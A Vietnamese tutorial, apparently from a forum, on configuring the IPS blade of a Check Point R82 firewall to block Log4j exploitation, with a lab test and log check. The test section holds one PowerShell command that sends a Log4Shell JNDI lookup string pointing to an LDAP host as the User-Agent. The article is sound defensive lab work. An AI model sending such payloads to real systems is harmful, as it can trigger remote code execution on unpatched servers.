Cấu hình IPS ngăn chặn tấn công trên Check Point R82: Thực chiến với Log4j Exploit
IPS - Intrusion Prevention System là một trong những tính năng quan trọng của NGFW, giúp phát hiện và ngăn chặn các hành vi tấn công khai thác lỗ hổng, dò quét hoặc traffic bất thường trong hệ thống mạng.Trong bài viết này, mình sẽ hướng dẫn cấu hình tính năng IPS trên Check Point R82 và kiểm tra thực tế bằng payload giả lập khai thác lỗ hổng Log4j.
1. Mô hình triển khai
Mô hình lab bao gồm các thành phần chính:| Thiết bị | Địa chỉ IP | Vai trò |
|---|---|---|
| Security Management Server | 10.120.170.201 | Quản lý Gateway bằng SmartConsole |
| Security Gateway | 10.120.170.200 | Thiết bị firewall chặn traffic |
| Internet Gateway | 10.120.170.250 | Đường ra Internet/update signature |
| LAN Internal | 192.168.10.0/24 | Mạng nội bộ |
| Client PC | 192.168.10.10 | Máy Windows dùng để test |
2. Các bước cấu hình trên SmartConsole
Bước 1: Kích hoạt IPS Blade
Trên giao diện SmartConsole, truy cập:Gateways & Servers → Double-click vào Gateway SGW
Tại mục General Properties → Network Security, tick chọn:
Mã:
IPS
Bước 2: Cập nhật IPS Database
IPS hoạt động dựa trên các signature/protection, vì vậy cần cập nhật database mới nhất từ ThreatCloud.Truy cập:
Security Policies → Custom Policy Tools → Updates
Tại mục IPS, chọn:
Mã:
Update Now
Bước 3: Tìm kiếm IPS Protection Log4j
Tiếp theo, truy cập:Security Policies → Custom Policy Tools → IPS Protections
Tại thanh tìm kiếm, nhập:
Mã:
Log4j
Mã:
Apache Log4j Remote Code Execution over Non-Standard Ports
Bước 4: Override Action sang Prevent
Trong cửa sổ cấu hình protection, tại profile đang sử dụng, ví dụ Optimized, chọn Override settings.Cấu hình như sau:
| Mục | Giá trị |
|---|---|
| Action | Prevent |
| Track | Log |
| Capture Packets | Enable |
Sau đó bấm OK và Close.
Bước 5: Publish và Install Policy
Sau khi cấu hình xong, chọn:
Mã:
Publish
Mã:
Install PolicyChờ hệ thống báo trạng thái Succeeded.
3. Kiểm tra hoạt động của IPS
Để kiểm tra IPS, mình sử dụng máy Client PC có IP 192.168.10.10 trong mạng nội bộ. Máy client đã được NAT qua Gateway để có thể truy cập Internet.Trên máy Client, mở Windows PowerShell và chạy lệnh sau:
Mã:
Invoke-WebRequest -Uri "http://example.com" -UserAgent '${jndi:ldap://10.120.170.250/malicious_code}'Kết quả trên máy Client
Kết nối HTTP bị ngắt do firewall phát hiện payload độc hại và can thiệp vào phiên kết nối.PowerShell hiển thị lỗi:
Mã:
The underlying connection was closed: An unexpected error occurred on a receive.
4. Kiểm tra log trên SmartConsole
Quay lại SmartConsole, truy cập:
Mã:
Logs & Monitor
Mã:
blade:"IPS" AND Log4jCác thông tin cần chú ý trong log:
| Trường | Kết quả |
|---|---|
| Blade | IPS |
| Action | Prevent |
| Protection Name | Apache Log4j Remote Code Execution over Non-Standard Ports |
| Severity | Critical |
| Source | 192.168.10.10 |
| Packet Capture | Có |
5. Kết luận
Sau khi triển khai IPS trên Check Point R82, Gateway đã có thể phát hiện và ngăn chặn các hành vi khai thác lỗ hổng dựa trên signature.Trong bài lab này, IPS đã chặn thành công payload giả lập khai thác Log4j và ghi nhận log đầy đủ trên SmartConsole với action là Prevent.
Một số điểm quan trọng cần kiểm tra khi cấu hình IPS:
- Gateway phải được bật IPS Blade.
- IPS Database cần được update thành công.
- Protection cần được chuyển sang Prevent.
- Phải Publish và Install Policy xuống Gateway.
- Log phải hiển thị Blade: IPS và Action: Prevent.
Đính kèm
Bài viết liên quan
Được quan tâm
Bài viết mới